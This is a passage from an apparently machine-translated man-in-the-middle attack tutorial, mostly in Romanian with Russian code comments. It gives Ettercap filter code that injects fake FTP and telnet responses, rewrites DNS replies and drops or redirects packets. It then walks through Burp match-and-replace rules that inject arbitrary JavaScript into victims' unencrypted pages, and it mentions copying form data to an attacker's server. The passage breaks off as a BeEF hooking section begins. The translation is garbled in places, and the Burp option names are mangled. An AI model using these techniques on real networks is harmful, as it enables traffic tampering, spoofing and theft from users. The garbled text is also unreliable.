ipv6.hl < 5) { msg("The IPv6 packet will die soon\n"); } # сравнение строки на данный сдвиг if (DATA.data + 40 == "ette") { log(DATA.data, "./logfile"); } # вставить файл после указанного пакета if (tcp.src == 21 && search(DATA.data, "root")) { inject("./fake_response"); } # целиком заменить пакет на другой if (tcp.src == 23 && search(DATA.data, "microsoft")) { drop(); inject("./fake_telnet"); } # Изменение бинарных данных используя внешнюю программу if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) { log(DATA.data, "/tmp/payload"); drop(); execinject("/bin/sed "s/\x03com\x00/\x02my\x04page\x02de\x00/g" /tmp/payload"); udp.len += 7; exec("/bin/rm /tmp/payload"); msg("faked"); } # фильтровать только указанный IP адрес if (ip.src == "192.168.0.2") { drop(); } # делать то же самое для IPv6 if (ipv6.src == "2001:db8::1") { drop(); } # комбинируем IPv4 и IPv6 if (eth.proto == IP && ip.dst == "192.168.0.2") { msg("drop IPv4"); drop(); } if (eth.proto == IP6 && ipv6.dst == "2001:db8::1") { msg("drop IPv6"); drop(); } # транслировать tcp пакеты с порта 80 на 81 if (tcp.dst == 80) { tcp.dst -= 1; tcp.dst += 2; } # найти и покалечить пакеты ESP if (ip.proto == ESP) { DATA.data = "DEADDECAF"; }

4.2 Falsificarea datelor cu Burp

Lansăm Ettercap și Burp așa cum este descris în paragraful 1.2 sau în paragraful 2.2.

În Burp du-te la Proxy -> Opțiuni. Găsim acolo Potriviți și înlocuiți. Clic Adăuga pentru a adăuga o nouă regulă.

• Antetul cererii este antetul cererii
• organismul de cerere- organismul cererii
• antetul răspunsului- antetul răspunsului
• organism de răspuns- corp de răspuns
• Solicitați numele paramului- Numele parametrului de interogare
• Solicitați valoarea parametrului- Solicitați valoarea parametrului
• Solicitați prima linie- Prima linie a interogării

Dacă trebuie să modificați datele transmise prin metoda GET, atunci acest lucru se aplică antetelor.

În marcajul HTML, există și un astfel de lucru ca head (etichetă head). Cele menționate mai sus nu au nimic de-a face cu acest titlu. Un pic mai sus se spune despre anteturile pachetelor. Dacă doriți să schimbați conținutul Pagini HTML, atunci ar trebui să alegeți întotdeauna Corpul răspunsului în loc de Antetul cererii, chiar dacă veți schimba conținutul etichetei head (de exemplu, titlul).

Dacă nu sunteți familiarizat cu expresiile regulate, atunci, în principiu, este în regulă: HTML iartă multe, iar ceea ce nu înțelege, pur și simplu ignoră - îl puteți folosi. Dacă știi să folosești expresiile regulate, atunci te respect.)))

De exemplu, să creăm o nouă regulă, să schimbăm antetul Cererii în Corpul răspunsului. În regula în sine, ne vom schimba

Bifeaza casuta Potrivire Regex.

Acum, pe toate site-urile (fără HTTPS) în loc de titlu, nu va fi nici un titlu:

Introduceți o linie arbitrară după eticheta body (va fi prima linie din text). Antetul cererii este schimbat în Corpul răspunsului. Noi schimbăm

Bifeaza casuta Potrivire Regex.

În colțul din dreapta sus (în funcție de aspect) apare inscripția „Sunt cool!”. Puteți insera CSS, cod JavaScript, orice text - orice. În general, puteți șterge totul din pagină și apoi umpleți-l cu propriul conținut - totul depinde de imaginația dvs.

A existat ideea de a modifica ușor fiecare formular, astfel încât datele să fie trimise la serverul original și la serverul atacatorului (implementați multi submit pentru fiecare formular). Dar având în vedere că, dacă datele transmise nu sunt criptate și avem acces la ele, atunci le vedem oricum, nu trebuie să le trimitem la niciun server. Cu toate acestea, dacă cineva are nevoie de el, un exemplu foarte funcțional de trimitere a datelor de la un formular către mai multe servere simultan.

5. Conectare BeEF

Pentru a începe să folosim caracteristicile BeEF, trebuie să încorporam un fișier JavaScript în HTML, de obicei o linie ca: